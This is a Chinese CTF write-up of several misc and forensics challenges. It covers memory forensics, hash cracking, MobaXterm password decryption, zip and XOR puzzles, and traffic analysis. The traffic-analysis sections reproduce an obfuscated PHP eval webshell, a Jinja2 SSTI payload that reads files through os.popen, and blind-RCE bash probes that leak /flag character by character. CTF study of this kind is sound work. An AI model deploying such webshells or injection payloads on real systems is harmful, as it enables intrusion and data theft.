前言
由于这几天和其他比赛冲突了,没有当场做,结束后容器不能起了,所以web题没有做,这里只记录几个misc题。
1、See anything in these pics?
题目内容:TBH THERE ARE SO MANY PICS NOT ONLY JUST 2 PIC
首先题目给的附件解压出来是两个文件,一个压缩包,一个Aztec 条码。压缩包解压需要密码,那么猜测Aztec码中放的就是解压密码:
尝试用:5FIVE
解压:
解压成功,给了一张图片:YVL.jpg
图片的隐写就那几种,foremost提取一下:
有一张黑色的图片,图片隐写其实就那几种,一个一个试试最后猜测是宽高被修改了,脚本跑一下:
import zlibimport structimport argparseimport itertoolsparser = argparse.ArgumentParser()parser.add_argument("-f", type=str, default=None, required=True, help="00000149.png")args = parser.parse_args()bin_data = open(args.f, 'rb').read()crc32key = zlib.crc32(bin_data[12:29]) # 计算crcoriginal_crc32 = int(bin_data[29:33].hex(), 16) # 原始crcif crc32key == original_crc32: # 计算crc对比原始crc print('宽高没有问题!')else: input_ = input("宽高被改了, 是否CRC爆破宽高? (Y/n):")if input_ notin ["Y", "y", ""]: exit()else: for i, j in itertools.product(range(4095), range(4095)): # 理论上0x FF FF FF FF,但考虑到屏幕实际/cpu,0x 0F FF就差不多了,也就是4095宽度和高度 data = bin_data[12:16] + struct.pack('>i', i) + struct.pack('>i', j) + bin_data[24:29] crc32 = zlib.crc32(data)if(crc32 == original_crc32): # 计算当图片大小为i:j时的CRC校验值,与图片中的CRC比较,当相同,则图片大小已经确定 print(f"nCRC32: {hex(original_crc32)}") print(f"宽度: {i}, hex: {hex(i)}") print(f"高度: {j}, hex: {hex(j)}") exit(0)
果然了,那就用TweakPNG
修改一下:
图片的宽高都在IHDR头里,双击这一行:
宽和高分别改成(1440,1800),然后保存图片:
出来了:flag{opium_00pium}
2、ez_forensics
题目内容:简单的内存取证
给了个镜像文件,肯定先文件扫描了,果然扫出了点东西:
python2 vol.py -f ezforensics.raw --profile=Win7SP1X64 filescan0x000000003fd39dc0 16 0 RW-r-- DeviceHarddiskVolume2UsersFlu0r1n3Desktophint.txt0x000000003eb51d00 16 0 -W---- DeviceHarddiskVolume2UsersFlu0r1n3Desktopf14g.7z0x000000003fa122e0 16 0 RW-r-- DeviceHarddiskVolume2UsersFlu0r1n3Desktopf14gmysecre
本以为直接导出来这个题就结束了,但是这里卡了很久,首先导出文件其实很简单,用偏移量即可,但是无论怎么导出来得到的都是空的,后来发现只能用vol3导出,用vol2导出的都是空文件。两个文件的内容就是这些了:
# mysecressh除了能在命令行中使用还能在哪用?# hint.txt60 = ( ) + ( )W@S Q9@S=5 RPW 92Q95S>N 7@P R96 N2QQU@P5 @7 R96 sXa
这些好像也看不出什么,然后就是压缩包了,但是压缩包需要密码才能解压,那就找吧:
filescan # 文件列表已经看完了没有东西cmdline # 历史命令clipboard # 粘贴板screenshot # 屏幕截图:IF_FloatingLangBar_WndTitlepslist # 进程iehistory # 浏览器历史记录notepad # 编辑板envars # 环境变量verinfo # 版本信息
该看的看了一遍,竟然都没有,思路到这里就断了,后来拐回来想想,难道是用户密码?
python2 vol.py --plugin=volatility_plugin -f C:UsersAdministratorDesktopezforensics.raw --profile=Win7SP1x64 hashdump# Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::# Flu0r1n3:1000:aad3b435b51404eeaad3b435b51404ee:15245efa2af8a339c15ed8e658911844:::
扔到cmd5跑一下,前两个是空密码,第三个跑出来了:
能跑出来大概率就是了,解压一下:strawberries
,得到了两个文件:
# mysecret.txtssh除了能在命令行中使用还能在哪用?# flag_is_here.ini[Misc]PasswordsInRegistry=0SkinSat=80SkinName3=Windows bright themeLastSession=8.146.206.183 (root)|#109#0%8.146.206.183%22%root%%-1%-1%%%%%0%0%0%%%-1%0%0%0%%1080%%0%0%1%%0%%%%0%-1%-1%0#MobaFont%10%0%0%-1%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%0%_Std_Colors_0_%80%24%0%1%-1%<none>%%0%0%-1%0%#0# #-1SessionP=525710918580MPSetDate=2024/9/14MPSetAccount=lppMPSetComputer=DESKTOP-BTGC50AWhenToPromptForMasterPassword=0RightClickAction=0RightClickAssigned=1[WindowPos_DESKTOP-BTGC50A_2254_1356]CompactMode=0MonitorCount=1Left=664Top=413Width=925Height=530Maximized=0SidebarVisible=1SidebarWidth=240[SSH]SFTPShowDotFiles=1SFTPAsciiMode=0MonitorHost=1MonitorCPU=1MonitorRAM=1MonitorNetUp=1MonitorNetDown=1MonitorProcesses=0MonitoFDs=0MonitorUptime=1MonitorUsers=1MonitorPartitions=1MonitorNfsPartitions=0MonitorNetstat=0StrictHostKeyChecking=0[Display]SidebarRight=0C10Checked=1C11Checked=1C12Checked=1C13Checked=0C14Checked=0VisibleTabNum=1VisibleTabClose=1MenuAndButtons=2BtnType2=2S3Checked=0[Recently started]16=15=14=13=12=11=10=9=8=7=6=5=4=3=2=1=User sessions8.146.206.183 (root)[Bookmarks]SubRep=ImgNum=428.146.206.183 (root)=#109#0%8.146.206.183%22%root%%-1%-1%%%%%0%0%0%%%-1%0%0%0%%1080%%0%0%1%%0%%%%0%-1%-1%0#MobaFont%10%0%0%-1%15%236,236,236%30,30,30%180,180,192%0%-1%0%%xterm%-1%0%_Std_Colors_0_%80%24%0%1%-1%<none>%%0%0%-1%0%#0# #-1[SSH_Hostkeys]ssh-ed25519@22:8.146.206.183=0x6156055a6c8a67727b08f315e254102f6f532459048e4190b2c6dbb182ec8349,0x53d745b68017b99e3b283ce6fe535722f1b3be59297aa321acc009027ef8d8c6sha256-ssh-ed25519@22:8.146.206.183=51:61:73:a8:2c:9d:06:62:1f:c8:a4:93:be:03:ae:79:43:2c:f0:a3:9c:3a:da:e1:cd:92:78:d0:73:3f:1c:3d[BrowsersFoldersHistory]SessionsList=ssh:[email protected]|ssh:[email protected]=/root/|[Passwords]mobauser@mobaserver=W0nmIUoAHiS7Enz5knrBGIULkm7tzQkTssh22:[email protected]=DLulatnJIPtEF/EMGfysL2F58R4dfQIbQhzwuNqL[email protected]=DLulatnJIPtEF/EMGfysL2F58R4dfQIbQhzwuNqL[Sesspass]lpp@DESKTOP-BTGC50A=AQAAAAtMPr5bFNBBgymNzfvqK1IAAAAAAgAAAAAAEGYAAAABAAAgAAAA9ciJP0h5btZporoTUuO+KSkZaXPyaFP0BIapWdBAtzIAAAAADoAAAAACAAAgAAAA3XiqLJcYkSKc4U53KEgUkLJ18XUZl839QJZSYWRNE7dgAAAAFvujlMf2YKFG+v4oWmg9/K7jcq4ramD+W3nkZ4Pb+c3xboscKEBHSJSjF4kEU1PWAem84pDNxBbiQ7khsErImifjFDrumtQbhiuy52rfNSXafA0i1VCkL/0m/GUqMg+1QAAAAH+cAI5triwt26T6cGMI4w6pZRWuiWtTYEl/9q9boN5Rhw5YYkSZ94gPm6u+MuG2iH5cKiqiKfV/aFLqmj7vseE=LastUsername=lppLastComputername=DESKTOP-BTGC50A[WindowPos_DESKTOP-BTGC50A_2258_1278]CompactMode=0MonitorCount=1Left=666Top=374Width=925Height=530Maximized=0SidebarVisible=1SidebarWidth=240[LastInstanceSessions]0= 1=User sessions8.146.206.183 (root)test
这玩意是真不认识啊,不过扔到AI里有了头绪:
MobaXterm的配置文件,整个文件里能看到的地方都没有flag,那很有可能flag在密文里了。
用工具解密:
https://github.com/HyperSine/how-does-MobaXterm-encrypt-password
python3 MobaXtermCipher.py dec -p flag_is_here DLulatnJIPtEF/EMGfysL2F58R4dfQIbQhzwuNqL# flag{eW91X2FyZV9hX2cwMGRfZ3V5}# -p参数后面跟的是密钥,其实就是文件名,不然解不出来的,这个题就没法做了# 最后面的密文就是root的登录密码
提交这个flag竟然不对,仔细看看,可能是base64,解码一下:
确实是base64……没必要吧,最后flag就是:flag{you_are_a_g00d_guy}
3、简单镜像提取
题目内容:RR_studio
附件打开是个pcapng流量包,那就直接上wireshark。
个人习惯打开wireshark先过滤http的流量:
还是有东西的,追踪流看看:
POST /uplaod/upload_file.php HTTP/1.1Host: localhost:82Connection: keep-aliveContent-Length: 9894Cache-Control: max-age=0sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"sec-ch-ua-mobile: ?0Origin: http://localhost:82Upgrade-Insecure-Requests: 1DNT: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoDWjVWvgUnUwW8AtUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost:82/uplaod/form.htmlAccept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6------WebKitFormBoundaryoDWjVWvgUnUwW8AtContent-Disposition: form-data; name="file"; filename="please recovery.zip"Content-Type: application/x-zip-compressedPK.........xoQ?(...$..........disk-recovery.img.]..W.........."C....."8...Z.......V....P...*V..j.{......Q...].......2.i...}............B]Hqt..q.^......../. .p.D!..;.|.0..$.St..".S.._....yz...3/m....{@Np.s.sQ...!....u..,u.qIio.R..a. ....~.....:...H.....^..U?'^[email protected]".,b.&....m...Kp.........}.UR.oL.h..I...........[.h...,.nYV..v.......or.n.7..]?as.....}...].a{.qw`a?...9EG".u.=...{..K.1O------WebKitFormBoundaryoDWjVWvgUnUwW8AtContent-Disposition: form-data; name="file"; filename="please recovery.zip"Content-Type: application/x-zip-compressed.....................................{p ...............................................................................6....................................................................@..............................................................*........ ..A............PK..?........xoQ?(...$........$....... .......disk-recovery.img. .........P~......T.U..<....T..<..PK..........c....$....------WebKitFormBoundaryoDWjVWvgUnUwW8AtContent-Disposition: form-data; name="submit"......------WebKitFormBoundaryoDWjVWvgUnUwW8At--HTTP/1.1 200 OKServer: nginx/1.15.11Date: Thu, 29 Apr 2021 06:53:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: PHP/7.3.49584...............: please recovery.zip<br>............: application/x-zip-compressed<br>............: 9.359375 kB<br>...........................: C:UsersGo upAppDataLocalTempphp48E.tmp<br>...............: upload/please recovery.zip
中间的内容省略了,大概就是上传了一个压缩包,名字是:please recovery.zip
那就用010给这个压缩包导出来,导出来并解压得到了:disk-recovery.img
这是个坏镜像,不能直接提取内容。不过题目已经多处暗示了,就是要恢复镜像。
其实题目也算给提示了,就是那个R-STUDIO
,这是一个磁盘恢复的工具。
工具打开镜像后就看到了这个文件:销售报表.xls
点开就看到了flag:flag{E7A10C15E26AA5750070EF756AAA1F7C}
4、压力大,写个脚本吧
题目内容:爆破
首先给了个压缩包:zip_100_1.zip
解压后是:
zip_99.zippassword_99.txt -> RkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZHRkdGR0ZH
把这段字符进行base64解码:
FGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFGFG
然后就可以用这个解压zip_99.zip
了。
解压后又是一个压缩包和一个文本,而且压缩包需要密码,文本里是一段base64编码。
那这个题的思路很清楚了,应该是100个压缩包的嵌套,而每个压缩包的解压密码都在当前目录的文本里,当然需要一次base64,怪不得题目是让写个脚本呢,那就上脚本吧:
import zipfileimport osimport base64import re# 设置压缩包的路径base_dir = ".\zip_dir"# 你存放压缩包的文件夹路径flag_file = os.path.join(base_dir, "flag.txt") # 保存密码的 flag.txt 文件# 递归解压压缩包defextract_zip(zip_path, target_dir):try:# 获取 zip 文件名(去掉扩展名) zip_file_name = os.path.basename(zip_path)# 使用正则提取压缩包中的数字编号(假设压缩包格式为 zip_XX.zip) match = re.match(r"zip_(d+).zip", zip_file_name)if match:# 提取编号并构建密码文件名 zip_number = match.group(1) password_file = os.path.join(target_dir, f"password_{zip_number}.txt")# 打印密码文件路径,帮助调试 print(f"密码文件路径: {password_file}")if os.path.exists(password_file):with open(password_file, 'r') as pf: password_base64 = pf.read().strip() # 读取密码内容并去除多余的空格# 对密码进行 Base64 解码 password = base64.b64decode(password_base64)# 将密码写入 flag.txtwith open(flag_file, 'a') as flag_f: flag_f.write(f"{password_base64}") print(f"密码 {zip_number} 已写入 flag.txt")else: print(f"密码文件 {password_file} 不存在!")returnelse: print(f"无法从文件名提取编号: {zip_file_name}")returnwith zipfile.ZipFile(zip_path, 'r') as zip_ref:# 解压所有文件 zip_ref.extractall(target_dir, pwd=password) print(f"成功解压: {zip_path}")# 查找嵌套的 zip 文件for file in zip_ref.namelist():if file.endswith('.zip'): nested_zip_path = os.path.join(target_dir, file) print(f"找到嵌套的压缩包: {nested_zip_path}")# 递归解压嵌套的压缩包 extract_zip(nested_zip_path, target_dir)except Exception as e: print(f"解压失败: {zip_path}, 错误: {e}")# 解压最外层的压缩包(例如 zip_100.zip)zip_file = "zip_99.zip"# 你要解压的最外层压缩包的名字zip_path = os.path.join(base_dir, zip_file)# 创建目标文件夹ifnot os.path.exists(base_dir): os.makedirs(base_dir)# 创建或清空 flag.txt 文件if os.path.exists(flag_file): os.remove(flag_file)# 开始解压extract_zip(zip_path, base_dir)
运行时候要注意,你的文件一定要这样放,不然跑不起来:
运行后得到zip_0.zip
内容:
看这提示的意思,难道是把所有的密码拼到一起么?
其实CTF做的多的看到password_0.txt
的内容应该就很敏感:
明显是PNG的文件头,那思路很清楚了,从password_0到password_99,把所有内容拼接到一起,上脚本:
password = ''for i in range(0,100):with open(f'password_{i}.txt', 'r') as f: password += f.read()print(password)
运行后得到的内容再base64解码一次:
给十六进制的数放010里去,保存成png文件,得到一个二维码:
扫码即可:flag{_PASSWORDs_is_fl@g!_}
5、简单算术
题目内容:想想异或
给了一串奇怪的字符:ys~xdg/m@]mjkz@vl@z~lf>b
题目说想想异或,但是没给key,那可能是让爆破,掏出cyberchef:
key=1f1f时,出了:flag{x0r_Brute_is_easy!}
6、NetHttp
题目内容:在凌晨一两点,公司内网有一台私人服务器被入侵,攻击者非常挑衅的留下了明显的痕迹。
给了个流量包,直接上wireshark,老规矩,先过滤HTTP:
一眼看出来,应该是模板注入进去的。
全部流量包分析完了,核心在这里:
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 26) == 'Z' ]; then echo "rce";fi# cat /flag:用于读取 /flag 文件的内容。# base64 -w 0:将读取的文件内容进行 Base64 编码,-w 0 表示不进行换行处理。# awk NR==1:使用 awk 工具选择第一行。# cut -c 26:使用 cut 命令截取第 26 个字符。# if [ $(...) == 'Z' ]:将前面一系列命令的结果与字符 Z 进行比较。# then echo "rce":如果比较结果为真,即截取的第 26 个字符等于 Z,则打印出 rce。# fi:结束 if 语句。
大致就是读取flag的每一个字符并与一个字母进行比较,如果相等就输出rce
比如这个是成功的:
那过滤器的语法就来了:http contains "Welcome rce"
得到了256个分组,首先,这时候过滤出来的肯定都是猜解正确的字符,然后我们给他全部导出来:
导出来后打开,把所有的base64编码提取出来,其实很好提取,用一个正则就行了:echo%20(.*?)%20
提取后得到所有猜解正确的base64编码,然后解码:
解码后发现总共查看了两个文件,一个是/app/secret/mw/m5
,一个是/flag
,对于做题,我们肯定是直接就分析flag文件了:
if [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 1) == 'R' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 2) == 'm' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 3) == 'F' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 4) == 'r' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 5) == 'Z' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 6) == 'S' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 7) == 'B' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 8) == 'G' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 9) == 'T' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 10) == 'G' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 11) == 'F' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 12) == 'n' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 13) == 'C' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 14) == 'm' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 15) == '5' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 16) == 'v' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 17) == 'I' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 18) == 'G' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 19) == 'h' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 20) == 'l' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 21) == 'c' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 22) == 'm' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 23) == 'U' ]; thenecho"rce";fiif [ $(cat /flag|base64 -w 0| awk NR==1 | cut -c 24) == 'K' ]; thenecho"rce";fi
全部拼接到一起就是:RmFrZSBGTGFnCm5vIGhlcmUK
被耍了有没有,所以还是要回去看上面那个/app/secret/mw/m5
,一样的提取方法,提取出来后拼接到一起就是:
if [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 1) == 'U' ]; thenecho"rce";fiif [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 2) == 'z' ]; thenecho"rce";fi……if [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 229) == 'P' ]; thenecho"rce";fiif [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 230) == 'Q' ]; thenecho"rce";fiif [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 231) == '=' ]; thenecho"rce";fiif [ $(cat /app/secret/mw/m5|base64 -w 0| awk NR==1 | cut -c 232) == '=' ]; thenecho"rce";fiUzBJM2lXaHZzektiT00vT2FsS1RBMGZwbTVPNWNoVlZuWUd5S2Q1blY0ZXJBelJiVjZWNnc4Yi9VaU9mUUVjM0lqaDAwaEZqWUZVMUhheE51YjlHbmxQUy9sY2FtNW1BVGtmMnNKUzZKZ3BKbzZBU2hWUnhXRFlLS3JvamVVZUJaajVNRVBJOC80REdHR3VIRnhteDJieEFhaGREZTFjR25qVFpHV09OcE5JPQ==
给这段字符base64解码一次:
S0I3iWhvszKbOM/OalKTA0fpm5O5chVVnYGyKd5nV4erAzRbV6V6w8b/UiOfQEc3Ijh00hFjYFU1HaxNub9GnlPS/lcam5mATkf2sJS6JgpJo6AShVRxWDYKKrojeUeBZj5MEPI8/4DGGGuHFxmx2bxAahdDe1cGnjTZGWONpNI=
再解就是乱码了,只能想别的方法。
这时候再拐回来看前边,发现攻击者还查看了private3.pem
文件:
name={{lipsum.__globals__.__builtins__.eval("__import__('os').popen('cat secret/private/private9.pem').read()")}}-----BEGIN ENCRYPTED PRIVATE KEY-----MIIC1DBOBgkqhkiG9w0BBQ0wQTApBgkqhkiG9w0BBQwwHAQIirzza4niI8QCAggAMAwGCCqGSIb3DQIJBQAwFAYIKoZIhvcNAwcECEXSIcOIuwGaBIICgHLW3Qb39/+E0uKiOi8yevcztF5toCOGsh6Fi23zSIwCjH8VPO1lbpFCkW9789ldbxBbSwtXwMmFkTyFjOmymL/zktmt8PyExcWOGA481/IkpCPTmKAT8+67FJEdAf9BAZVPjqpu1LlaOhnp3JFZ8SStSUWwvjLZafi4Ucf7ajJexwCTkkvB7mF8kostYaBOsNJ1GORRdL3cs73GxvX98MTLvF1DW5xujgdcl28msB3GHTxe7sSgScKfFUyfCViivW8FCqa6lfJoTj3JZtNlpPiOr1PXPfIWBt0wEQaF3+ovTEVu7x1r1Q3mq61GpO3s4n6kdeGg9DkpBYErmG76JdZtOWTZ88SrD7EDkh12EOdtM0ywR1DTYk4+fjKifkhPPrIGn8Nm07PEyTAS7UG0Ut2Ut722rOBsgIZlnk2vF8qbIvKJj1JGzedMLabnafF5/L2N4wP8ZeL8fO1Asxy0o/Hk89rl7ZI8Aocc1ZRMHKfxg/XV2bFHv2q1M1y3CI9wUrGnvk+8oX0HT/5vFtfGb4QNiy+p6aTi+UEJOau5O0t4f2kAL6L/pgmLEMulKWVMK8u+p6os0cbtKbVBmjNE/uA8SCv8E9XcL+/LWsSVInrYwJQzWbLIYx5FTRk4479taV3BGEN+hbmURqlIK8IwsVxWc4wC+oHoLMY4RllUZ9D2rBasMt6DOLA31Jjrabciv03zJPyqXcfiDVTFu9JfT1fF7eOClQzTvIlTDVIDMPfAqR6B+/AbZDiQ2aK/54i10kohmXT2qWoTpDYPWV2JGTXICaRyP8FYu26ZTdIKVB3PovfJEXR3yex14U5T8zFVpUQnoDJfNyPGqUVmlGScmkU=-----END ENCRYPTED PRIVATE KEY-----
这是证书的私钥啊,2号流量包还给了脚本:
from flask import Flask,request,render_template_string,Response,sessionapp = Flask(__name__)app.config['SECRET_KEY'] = 'gdkfksy05lx0nv8dl'@app.route("/")defindex():return open(__file__).read()@app.route("/rce",methods=["GET"])defrce(): data = request.args.get("name","Guest")return render_template_string(f"Welcome {data}")if __name__ == "__main__": app.run(host="0.0.0.0",port=8989,debug=False)
用openssl解密得到私钥,密钥就是上面脚本里的gdkfksy05lx0nv8dl
:
$ openssl rsa -in 1.pem -out 2.pem# Enter pass phrase for 1.pem:# writing RSA key-----BEGIN RSA PRIVATE KEY-----MIICWwIBAAKBgGsWCFOw+ZSJ3SAS7m0UcsCWYgEPdEIkY7hwCLMspGuvVpdZ/SuFvf4YzQ3iOQT9eKAA0pjqiypo/J8NsG5NJg2dCm1n093gsbbRqKZTBKAqios0zHRxnuzFGivQNgiiBzrB0IZKQJsC3A8za2y4PZ8dIYz1A3n6sAp9auwfyEDzAgMBAAECgYBEGkP7ba6cH71IW6HUL0/3WOxE/l4SfnAI6P8va/G5Jk5sfOd8WVcGFSG7daaLnOOs5jkI1QjiVNhsEtmknF3ZMfBZtWECas28XGeKBAP3+uhPfeetLpt0UbGuw1isDXSHFOMLpMn4MeXyC6IrhPE4Yxtt1W96Azs2iIcgq3DuuQJBAKWSY8ZjJNAAfGVJISKsPtoA+DeUj4rGnvmhXy4C7deB+FcEmcZdpEbO8oWRpebKRZcXaLcpt2Ev99GmN//txj0CQQClkmPGYyTQAHxlSSEirD7aAPg3lI+Kxp75oV8uAu3XgfhXBJnGXaRGzvKFkaXmykWXF2i3KbdhL/fRpjf/7cbvAkEAn9gyJwb0NTMi5Q2yxayQiRrCh7YO1iVmuQ0HvH3rbFD3ldrFMnKY9Bs6m6S/C45fnLxmxd2qQlNy5p2YFqZQ6QJAfotRGKpj01nbuWnYGnD9JI+DJq+zucQucupEHZ19fK3ISXGpufON/9RhhXaZDrhf0afBj+QhVPVdee2JdWCdHwJAL3BqQAhFg4GT0jvIxla+l6FbQNLVtiTF/5z6MSNbKCxt/CsGqnP/m3qTJkUOdHZb2VAOLrn5kzdzlqy/gWr1NA==-----END RSA PRIVATE KEY-----
然后去网站上用私钥得到RSA的公钥和私钥:
https://www.ssleye.com/ssltool/priv_get.html
得到参数,正常RSA解密即可:
import base64from Crypto.Util.number import long_to_bytes, bytes_to_longn=75198391834610743089994427445022622171591577121191724448299339002435832997164232218413508119298295123274196848013892501604504507367027410527023618161491726166765575077336751590544863722532358737240337140569730023629526218796143738463727597005256155751094703947322244106639054703290232743344051122409847668979e=65537d=47823271942181380918380117208311303072917059719458472058236845602980348253487465624475587910710493956741157673197903864601280854518063619685915091953443290538916965993327948549512195024615088046785300748165298087812720446099735944950660175124872626742440697531498487595767064570672468310421018941583067770553# Base64 解码密文c = 'S0I3iWhvszKbOM/OalKTA0fpm5O5chVVnYGyKd5nV4erAzRbV6V6w8b/UiOfQEc3Ijh00hFjYFU1HaxNub9GnlPS/lcam5mATkf2sJS6JgpJo6AShVRxWDYKKrojeUeBZj5MEPI8/4DGGGuHFxmx2bxAahdDe1cGnjTZGWONpNI='c_decode = base64.b64decode(c)c_decode_num = bytes_to_long(c_decode)m = pow(c_decode_num, d, n)print(long_to_bytes(m))# b'flag\{343907d2-35a3-4bfe-a5e1-5d6615157851\}'
其实也可以不用这么麻烦,cyberchef真的yyds啊,拿着上面解出来的私钥,放到cyberchef的RSA Decrypt
里,前边再放个From Base64
直接解出明文。
ok,终于结束了这个题,出题人快来让我暴打一顿。
7、Weevil's Whisper
题目内容:Bob found that his computer had been hacked. Fortunately, he was using wireshark to test packet capture before the hack. Would you please analyze the packet and find out what the hacker did
题目给了个压缩包,解压时个流量包,那还是老规矩,先过滤http请求看看:
第一个包是访问了/upload
目录,接下来就是一直在访问/shell1.php
了,那八成访问/upload
就是在上传这个shell1.php
,追踪流看一下这个8号包,果然是上传了这段代码:
<?php $k="161ebd7d"; $kh="45089b3446ee"; $kf="4e0d86dbcf92"; $p="lFDu8RwONqmag5ex";functionx($t,$k){ $c=strlen($k); $l=strlen($t); $o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){ $o.=$t[$i]^$k[$j]; } }return $o; }if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) { @ob_start(); @eval(@gzuncompress(@x(@base64_decode($m[1]),$k))); $o=@ob_get_contents(); @ob_end_clean(); $r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");} ?>
大概能明白,其实我们需要看的是:$r
的值,但是它输出的时候把这几个变量全混到一起了,那就先把$r
取出来,然后base64,然后异或(key是161ebd7d
),再gzlib就行了。
我们以21号流量包的内容为例分析一次:
# 1S/#+4)~)z,kA$u45089b3446eeSaoaTMgwnyp8+PmyUlEBVwbjhcsvKhst/+ZByCoqGkz4+v42Mi3iYBpmYVfrVPxVukQ8bzC2ZC3kg3oqT20eLn145LXuUr/pZ3waqCliXjS742LXMOQclXwbHysuYx22cuReOGlkKTMUSQ4e0d86dbcf923^0(~}9G(y.l>nD"1、先取出$r:$p是16位,$kh是12位,加起来是28位,那么第29位开始就是$r,而$kf是12位,那么结尾就是倒数第13位,得到:SaoaTMgwnyp8+PmyUlEBVwbjhcsvKhst/+ZByCoqGkz4+v42Mi3iYBpmYVfrVPxVukQ8bzC2ZC3kg3oqT20eLn145LXuUr/pZ3waqCliXjS742LXMOQclXwbHysuYx22cuReOGlkKTMUSQ4e0d86dbcf923^0(2、对这串字符先base64,再异或(key:161ebd7d),最后gzlib,得到明文:try {echo(53675);}catch(Exception $e){echo"4X6l6ZERR".$e->getTrace()[0]["function"].": ".$e->getMessage()."4X6l6ZERR";}
那么接下来也没什么好办法,把所有的HTTP请求包和响应包导出来,一个个分析就行了,在最后一个包里(287号)终于找到了(NND,早知道从后往前看了):
分别解码得到:
try {chdir('C:ApplicationsphpStudyphpStudy_64phpstudy_proWWW');@error_reporting(0);@system('type flag.txt 2>&1');}catch(Exception $e){echo"4X6l6ZERR".$e->getTrace()[0]["function"].": ".$e->getMessage()."4X6l6ZERR";}flag{arsjxh-sjhxbr-3rdd78dfsh-3ndidjl}
8、find me
题目内容:0x1337年奶龙大军入侵地球,人类命运危在旦夕。就在这紧急时刻,cow与贝利亚大人进行了联络,寻求帮助。伟大的贝利亚给了cow一份文件,而在这文件里藏着拯救地球的秘密,你能否找到它!!!!
这玩意打开后真的是一脸懵逼呀,还好有AI:
《我的世界》的配置文件,卧槽。这让我们这些没玩过的老年人怎么弄?
折腾了半天放弃了。
这个题去看这篇文章吧f:https://www.cnblogs.com/Mi1kTe4/articles/18680528
flag{535e0a20-189e-4049-ab30-dec60bac91b8}
原文始发于微信公众号(南有禾木):2025春秋杯网络安全联赛冬季赛-部分misc
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论